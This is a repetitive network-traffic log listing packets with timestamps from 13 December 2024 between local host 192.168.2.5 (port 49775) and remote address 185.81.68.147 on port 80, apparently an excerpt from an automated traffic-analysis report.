                                                                                                                                                                Dec 13, 2024 01:37:35.870054960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870085955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870102882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870117903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870132923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870161057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870174885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870194912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870225906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870244980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870259047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870284081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870300055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870322943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870336056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870353937 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870379925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870492935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870523930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870537996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870562077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870585918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870600939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870620966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870657921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870672941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870696068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870714903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870737076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870871067 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870884895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870908976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870934963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870958090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870979071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.870992899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871012926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871036053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871051073 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871074915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871154070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871184111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871196985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871227980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871242046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871258020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871273994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871299028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871332884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871386051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871414900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871428967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871455908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871481895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871498108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871515989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871596098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871609926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871629953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871654034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871668100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871691942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871705055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871731997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871751070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871768951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871789932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871803999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871825933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871844053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871867895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871881008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871915102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871931076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871952057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.871980906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872004032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872023106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872049093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872062922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872091055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872106075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872128010 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872142076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872163057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872186899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872205019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872502089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872535944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872559071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872574091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872607946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872622013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872642994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872656107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872678995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872694969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872716904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872730970 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872750044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872764111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872792959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872917891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872934103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872970104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.872996092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873011112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873040915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873064995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873080015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873291016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873323917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873338938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873363018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873377085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873399973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873414040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873440981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873495102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873511076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873549938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873569012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873586893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873615980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873629093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873651028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873668909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873682976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873707056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873724937 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873748064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873761892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873779058 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873805046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873819113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873842955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873876095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873904943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873919964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873949051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873964071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873984098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.873999119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874016047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874037981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874053001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874078989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874093056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874115944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874134064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874157906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874172926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874196053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874224901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874241114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874267101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874279976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874300957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874315977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874332905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874356031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874377966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874391079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874418974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874433041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874458075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874476910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874500990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874515057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874537945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874555111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874576092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874830008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.874978065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875000954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875046015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875061989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875092030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875106096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875133991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875159979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875189066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875204086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875226021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875248909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875272036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875380993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875421047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875437021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.875466108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877525091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877552986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877571106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877587080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877610922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877635956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877651930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877789021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877803087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877826929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877850056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877866030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877888918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877907991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877926111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877948046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.877971888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878103018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878118038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878134966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878160000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878180981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878204107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878221989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878242970 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878268003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878290892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878413916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878428936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878452063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878470898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878493071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878508091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878528118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878541946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878568888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878585100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878717899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878731966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878863096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878890991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878914118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878940105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878953934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878973961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.878997087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879014015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879034996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879048109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879074097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879101992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879117012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879134893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879148960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879172087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879198074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879216909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879232883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879297972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879336119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879360914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879374027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879395008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879409075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879431009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879492044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879514933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879529953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879549980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879565954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879595041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879610062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879630089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879645109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879662991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879688978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879867077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879898071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879913092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879935026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879960060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879976988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.879998922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880012989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880024910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880053997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880069017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880086899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880100965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880121946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880143881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880167007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880181074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880196095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880213022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880424976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880449057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880462885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880482912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880497932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880525112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880538940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880558968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880573988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880594969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880624056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880640030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880661964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880676985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880700111 CET4977580192.168.2.5185.81.68.147
